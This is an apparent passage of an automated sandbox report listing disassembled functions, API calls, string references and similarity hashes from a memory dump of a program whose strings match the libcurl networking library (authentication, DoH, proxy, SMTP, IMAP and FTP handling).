Part of subcall function 0010ADF2: free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 0010AE3D

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,0000000A,?,?,?,?,?,?,?,?,?,?,?,0010B2F1,?), ref: 0010FBFD
calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,0000000A,?,?,?,?,?,?,?,?,?,?,?,0010B2F1,?), ref: 0010FC53
calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,0010B2F1,?,?,?,00000000), ref: 0010FCA7

Strings

SSPI: couldn't get auth info, xrefs: 0010FBB9
GSSAPI handshake failure (empty challenge message), xrefs: 0010FCC4
Kerberos, xrefs: 0010FBA3, 0010FC72

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: callocfree$_strdupmalloc
String ID: GSSAPI handshake failure (empty challenge message)$Kerberos$SSPI: couldn't get auth info
API String ID: 3060414022-4232989830
Opcode ID: 5c365c5c5e4ef6b50be41dfb12f4ceafe46dbef9b67e10b0952a40daef3b5e1c
Instruction ID: 3e5371935f5b6b716e55dd52d658afed0fdc22411ab421547e2f03c3c789ab95
Opcode Fuzzy Hash: 5c365c5c5e4ef6b50be41dfb12f4ceafe46dbef9b67e10b0952a40daef3b5e1c
Instruction Fuzzy Hash: B7916171A00619AFDB24CF54D955AAEBBF5FF08310F14812EE845E7A90D7B0AD42CB91

Function 000EBED0 Relevance: 9.2, APIs: 4, Strings: 2, Instructions: 212COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000EBEFF
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000EBF35
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000EC00C
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000EC161

Part of subcall function 000DA7F6: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00000000), ref: 000DA80D

Strings

No URL set, xrefs: 000EBF4E
User-Agent: %s, xrefs: 000EC172

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: free
String ID: No URL set$User-Agent: %s
API String ID: 1294909896-339178133
Opcode ID: de3a9bc7c1ec24318abb4c2be0d88bc6b8444b5bcc0e067ab34e98587ad420de
Instruction ID: 048ed13ed372395f9b152f30a7eafbba292cd99de8ab660ec81943402fcf2c48
Opcode Fuzzy Hash: de3a9bc7c1ec24318abb4c2be0d88bc6b8444b5bcc0e067ab34e98587ad420de
Instruction Fuzzy Hash: AC917A35604281CFEF598F69D8C0BE63BA1AF45310F2841BADC599F28BDB715942CB71

Function 001093A7 Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 191COMMON

Download Yara Rule

Strings

DoH: %s type %s for %s, xrefs: 00109516
Could not DoH-resolve: %s, xrefs: 001093F8
DoH Host name: %s, xrefs: 0010955F
AAAA, xrefs: 00109507
bad error code, xrefs: 001094F5, 00109515

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID:
String ID: AAAA$Could not DoH-resolve: %s$DoH Host name: %s$DoH: %s type %s for %s$bad error code
API String ID: 0-4260076447
Opcode ID: a23c48085003837b79c0e1f419b87e863ce53f3477a7f879e6d4ed8b5001d0f8
Instruction ID: 93c635c451fd08e8d0393b929d40edc325870d8c5e10f986adbf765dcae0bc84
Opcode Fuzzy Hash: a23c48085003837b79c0e1f419b87e863ce53f3477a7f879e6d4ed8b5001d0f8
Instruction Fuzzy Hash: B8719371A013159FDB29DF24DCA9BA9B3B5EF44310F1041AEE449AB2D2DBB46E81CF50

Function 000F1EB9 Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 164COMMON

Download Yara Rule

APIs

Part of subcall function 000D5DA0: calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,000E33F9), ref: 000D5DB7

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000F1FCD

Strings

;type=%c, xrefs: 000F2037
;type=, xrefs: 000F1FF5
?%s, xrefs: 000F2053
http, xrefs: 000F1F56
ftp, xrefs: 000F1FDE

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: callocfree
String ID: ;type=$;type=%c$?%s$ftp$http
API String ID: 306872129-3547414
Opcode ID: c83f0074307339090513d8df9a215347a0813f7e033dd3699b7d2d3b0e107555
Instruction ID: 1299f2ce26a34b865c5c09c7996113e7263ab26ab40daa17383411df17209182
Opcode Fuzzy Hash: c83f0074307339090513d8df9a215347a0813f7e033dd3699b7d2d3b0e107555
Instruction Fuzzy Hash: B6412832704709ABEB799625D855FBB2BE68FC5760F14403BE9089BAC3EF20DC51D264

Function 000F5FFA Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 145COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000F6136

Strings

VRFY %s%s%s%s, xrefs: 000F6110
EXPN, xrefs: 000F603C
%s %s%s, xrefs: 000F606E
HELP, xrefs: 000F6144, 000F6149
SMTPUTF8, xrefs: 000F6059, 000F6061, 000F60F5, 000F60FF

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: free
String ID: SMTPUTF8$%s %s%s$EXPN$HELP$VRFY %s%s%s%s
API String ID: 1294909896-2300960079
Opcode ID: 2087b646c7dfa8ec613a7ad60962e36b0f590ad46cea5aefc910c384288aea18
Instruction ID: 48f71221da6f948801c2f33ef059d7f19e692c44c073ff061e70d8fdd9e8254e
Opcode Fuzzy Hash: 2087b646c7dfa8ec613a7ad60962e36b0f590ad46cea5aefc910c384288aea18
Instruction Fuzzy Hash: C0413670B0412A9BEB14CA588D40ABF77E9EF56310F2C81B9EE41D7742DB62DD41A790

Function 00100BB3 Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 136COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,000009B8,?,?,000F0F95,?,?,00000000,?), ref: 00100C78

Strings

NTLM handshake rejected, xrefs: 00100CF3
NTLM handshake failure (internal error), xrefs: 00100D1C
NTLM handshake failure (empty type-2 message), xrefs: 00100C52
NTLM, xrefs: 00100BD1
NTLM auth restarted, xrefs: 00100C10

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: malloc
String ID: NTLM$NTLM auth restarted$NTLM handshake failure (empty type-2 message)$NTLM handshake failure (internal error)$NTLM handshake rejected
API String ID: 2803490479-2228421627
Opcode ID: 3386bf01cd9e34d3f8a46040bd3ed34fea1aba88873c1ecf909bf43bdf335524
Instruction ID: 1b941945890a4f56f4ca0d38d0c671b9a36379d884b600c86aa93b30c931d979
Opcode Fuzzy Hash: 3386bf01cd9e34d3f8a46040bd3ed34fea1aba88873c1ecf909bf43bdf335524
Instruction Fuzzy Hash: 9941FC71A04306AFEB16DF58D991BAD77E4AF1C310F2044AAE445A72C2EBB19D44CB50

Function 001016F0 Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 109COMMON

Download Yara Rule

Strings

APPEND %s (\Seen) {%I64d}, xrefs: 0010180B
Mime-Version, xrefs: 0010175A
Mime-Version: 1.0, xrefs: 00101771
Cannot APPEND without a mailbox., xrefs: 00101701
Cannot APPEND with unknown input file size, xrefs: 001017CF

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID:
String ID: APPEND %s (\Seen) {%I64d}$Cannot APPEND with unknown input file size$Cannot APPEND without a mailbox.$Mime-Version$Mime-Version: 1.0
API String ID: 0-3307439731
Opcode ID: 5699ab1decc82f64b1053d5e87db5b6d116aae688e15756d9d2104b6095c7683
Instruction ID: 0ae8a5535ec41742c0fd228c52de8df0c5a3e8c5c594808cc13f9b2374bb7491
Opcode Fuzzy Hash: 5699ab1decc82f64b1053d5e87db5b6d116aae688e15756d9d2104b6095c7683
Instruction Fuzzy Hash: 5E314631304B02BBEB1C5B249896BBAB391BB84710F10422EF4599B2C1DFB86811CBD5

Function 000F04FF Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 102COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00000000,?,?,?), ref: 000F05B5
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,00000000,?,?,?), ref: 000F05F1
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00000000,?,?,?), ref: 000F0612

Strings

%sAuthorization: Basic %s, xrefs: 000F05CD
%s:%s, xrefs: 000F0557
Proxy-, xrefs: 000F05BB, 000F05CC

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: free
String ID: %s:%s$%sAuthorization: Basic %s$Proxy-
API String ID: 1294909896-2961970465
Opcode ID: 3ed602fb65d6c41e93f3d5fc2d7a3f9e8887b162ef12d1e184f670c4050be1c7
Instruction ID: 41106af0d040d075c2f23ba665929c80f6fa895dd2234f034d0e0c5aa0fd2f04
Opcode Fuzzy Hash: 3ed602fb65d6c41e93f3d5fc2d7a3f9e8887b162ef12d1e184f670c4050be1c7
Instruction Fuzzy Hash: E131E535B0060DEFDB088B94DC507BEBBB6EF84314F10807AE90197242DBB19D56DBA0

Function 000FCD83 Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 92COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000FCDAE
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000FCE26

Strings

OS/400, xrefs: 000FCDE8
SITE NAMEFMT 1, xrefs: 000FCDF6

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: freemalloc
String ID: OS/400$SITE NAMEFMT 1
API String ID: 3061335427-2049154998
Opcode ID: ab1eb02adc54a486e3b33418f8d75464199e6bc02b12ee6f39a205750f9d20a2
Instruction ID: 71f79a5a3f95aef3b5399a9b5aab8bd8abe581892c357f34ef6872c9feff45e7
Opcode Fuzzy Hash: ab1eb02adc54a486e3b33418f8d75464199e6bc02b12ee6f39a205750f9d20a2
Instruction Fuzzy Hash: 7531C471A0411DDBEF24CF58DA41ABC7BF1EB44350F1840BAEA45EBB42CB705D42ABA5

Function 000CEDCE Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 83COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?), ref: 000CEE54
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?), ref: 000CEE65

Strings

slist%d = NULL;, xrefs: 000CEE05, 000CEE39
struct curl_slist *slist%d;, xrefs: 000CEDE7
slist%d = curl_slist_append(slist%d, "%s");, xrefs: 000CEE85
curl_slist_free_all(slist%d);, xrefs: 000CEE1F

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: free
String ID: curl_slist_free_all(slist%d);$slist%d = NULL;$slist%d = curl_slist_append(slist%d, "%s");$struct curl_slist *slist%d;
API String ID: 1294909896-250881521
Opcode ID: 500595a06d02437939dbc0f29ae76f0f1a03f0897b451b2dec8e09743bf474d1
Instruction ID: 5a9fa458f1591249d32b9bc8e54e94a8298c213c1d0720144f86670a19b808b1
Opcode Fuzzy Hash: 500595a06d02437939dbc0f29ae76f0f1a03f0897b451b2dec8e09743bf474d1
Instruction Fuzzy Hash: 26210D32A446B0BFCB315794EC42F9E37E09B45BB0F14427CFC04EB191E7A08E128691

Function 000E3B5F Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 81COMMON

Download Yara Rule

APIs

tolower.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 000E3B8B

Strings

http_proxy, xrefs: 000E3BBC
all_proxy, xrefs: 000E3BFF
Uses proxy env variable %s == '%s', xrefs: 000E3C25
_proxy, xrefs: 000E3B9C
ALL_PROXY, xrefs: 000E3C11

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: tolower
String ID: ALL_PROXY$Uses proxy env variable %s == '%s'$_proxy$all_proxy$http_proxy
API String ID: 3025214199-127164392
Opcode ID: fe02b5b626877ad49ee8f95a31b79bcf85c152fdddef295c499d8909968b53e7
Instruction ID: ed03d3b32779e631419e33c9a3cda853f51ee4a37ba513c6327f15c8f1f35e28
Opcode Fuzzy Hash: fe02b5b626877ad49ee8f95a31b79bcf85c152fdddef295c499d8909968b53e7
Instruction Fuzzy Hash: 2E213A31E007B54BC7629B295904BFA7BB46F91764F0541E6E885BB302DF60CE4987D0

Function 000E8AFD Relevance: 9.1, APIs: 6, Instructions: 57COMMON

Download Yara Rule

APIs

EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,00000000,00000000,00000001,000009C9,000009C9,?,000E1E86,?,?,00000000), ref: 000E8B1D
LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,000E1E86,?,?,00000000), ref: 000E8B30
CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?,?,000E1E86,?,?,00000000), ref: 000E8B3C
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,000E1E86,?,?,00000000), ref: 000E8B69
closesocket.WS2_32(000E1E86), ref: 000E8B7A
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E8B94

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: CriticalSectionfree$CloseEnterHandleLeaveclosesocket
String ID:
API String ID: 469868127-0
Opcode ID: aa114a9388969b9b549d9f9bafefb33577adaf652a94d54db222f701c8c14bd0
Instruction ID: e5dbd76ffe00b12ebfb6651101bc510b79ab0b8fb3111c196d1ea67f3a03487f
Opcode Fuzzy Hash: aa114a9388969b9b549d9f9bafefb33577adaf652a94d54db222f701c8c14bd0
Instruction Fuzzy Hash: 6611C136A00610EFCB099F60D94879DBBB2FF48311F148069E805A3761DB70BC91CBE1

Function 000EB751 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 302networkCOMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000EB8C8
WSAIoctl.WS2_32(?,4004747B,00000000,00000000,?,00000004,?,00000000,00000000), ref: 000EB9D9
setsockopt.WS2_32(?,0000FFFF,00001001,?,00000004), ref: 000EB9F4

Strings

Failed to alloc scratch buffer, xrefs: 000EB8D5
We are completely uploaded and fine, xrefs: 000EBAC3

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: Ioctlmallocsetsockopt
String ID: Failed to alloc scratch buffer$We are completely uploaded and fine
API String ID: 3560301164-2419666956
Opcode ID: 95ce2eed7cbdeb2b8f3d651eb2724bfae7eae5bcbbd087a50af3986bf8b57b4d
Instruction ID: 657ca5dd9bdd2135ba253dcafa4732515cd37a3bbeb8ffeea979af15f8a5afe5
Opcode Fuzzy Hash: 95ce2eed7cbdeb2b8f3d651eb2724bfae7eae5bcbbd087a50af3986bf8b57b4d
Instruction Fuzzy Hash: 02C1A071B04686AFDB58CF29C581BEBB7F5BF44310F14417AE818EB242D770A841CBA1

Function 000CD5FC Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 117stringCOMMON

Download Yara Rule

APIs

_strdup.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 000CD618
strtok.API-MS-WIN-CRT-STRING-L1-1-0(00000000,001207BC), ref: 000CD631
strtok.API-MS-WIN-CRT-STRING-L1-1-0(00000000,001207BC), ref: 000CD6C9
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 000CD715

Strings

unrecognized protocol '%s', xrefs: 000CD6AF

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: strtok$_strdupfree
String ID: unrecognized protocol '%s'
API String ID: 2873614617-1936080967
Opcode ID: 2ce21cf608d15dcc9a44d07c2360ce92b8c6e0149e11dd80f85d621a55cdf183
Instruction ID: 0a1cf0391792372617a5a1dde42ee4445616fc6542d7340810778935d04b4298
Opcode Fuzzy Hash: 2ce21cf608d15dcc9a44d07c2360ce92b8c6e0149e11dd80f85d621a55cdf183
Instruction Fuzzy Hash: 8331F631A04611DBDB619B689995F7DBBE1EB45764F20023FE84AE7241E770DC01C790

Function 000F526D Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 105COMMON

Download Yara Rule

APIs

_strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00000000), ref: 000F5305
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000F533E
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 000F535A
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 000F5391

Strings

realm, xrefs: 000F52EA

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: free$_strdup
String ID: realm
API String ID: 2653869212-4204190682
Opcode ID: 630b524f63615f5044bce3ac849ce412de157144f9932f054688095d240ca5bb
Instruction ID: 4055240bf37692505751f6827ff71bbc2ceadce73f9f126eb4e839452df06828
Opcode Fuzzy Hash: 630b524f63615f5044bce3ac849ce412de157144f9932f054688095d240ca5bb
Instruction Fuzzy Hash: AE310831900B18DBCF649F18DC80ABEB7F4EF49352F1441AEEA8597642DBB08D859F60

Function 000F75C0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 103COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000F7629
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000F766C
_time64.API-MS-WIN-CRT-TIME-L1-1-0(-000001F4,-000001F4,?,000003E8,00000000), ref: 000F769F

Strings

Connection time-out, xrefs: 000F75F6
set timeouts for state %d; Total % I64d, retry %d maxtry %d, xrefs: 000F768B

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$_time64
String ID: Connection time-out$set timeouts for state %d; Total % I64d, retry %d maxtry %d
API String ID: 3039015236-3364887516
Opcode ID: 3f95387cc8c250c5ad497e77381fe0aa1d783ae2185b6a4f7888f76f34a26037
Instruction ID: bc2d34f6ce70fb38ab5f87215e1a921e58b0efbe3926077bfccadb59f37ad66b
Opcode Fuzzy Hash: 3f95387cc8c250c5ad497e77381fe0aa1d783ae2185b6a4f7888f76f34a26037
Instruction Fuzzy Hash: 01210671608B045FD7389E299C05D7B76DAEBC8710F240E3FF149C6681FB61D940A791

Function 000D0878 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 94COMMON

Download Yara Rule

APIs

fputc.API-MS-WIN-CRT-STDIO-L1-1-0(00000022,00000000,00000000,00000000,?,?,000D09E5,00000000,?,000D07A5,?,?), ref: 000D0896
fputc.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000000,000D09E5,00000000), ref: 000D08FD
fputs.API-MS-WIN-CRT-STDIO-L1-1-0(00121D90,00000000,000D09E5,00000000,?,000D07A5,?,?), ref: 000D093B
fputc.API-MS-WIN-CRT-STDIO-L1-1-0(00000022,00000000,?,?), ref: 000D094F

Strings

u%04x, xrefs: 000D08D8

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: fputc$fputs
String ID: u%04x
API String ID: 1019900953-2707630279
Opcode ID: cf6062fd2253fcff0cdfc5818b6769876d7c319baf4394a2091f86814ee66eed
Instruction ID: ee66688d58c65e532b1c5897aa506847a1690f48fa8c27b01971bd2ac1a3164b
Opcode Fuzzy Hash: cf6062fd2253fcff0cdfc5818b6769876d7c319baf4394a2091f86814ee66eed
Instruction Fuzzy Hash: 64214931189325B5F638452ABC3DBFBAF99DB537B4F648017F14D42783CA524502C1B0

Function 000FA10A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 92networkCOMMON

Download Yara Rule

APIs

getsockname.WS2_32(?,?,?), ref: 000FA14D
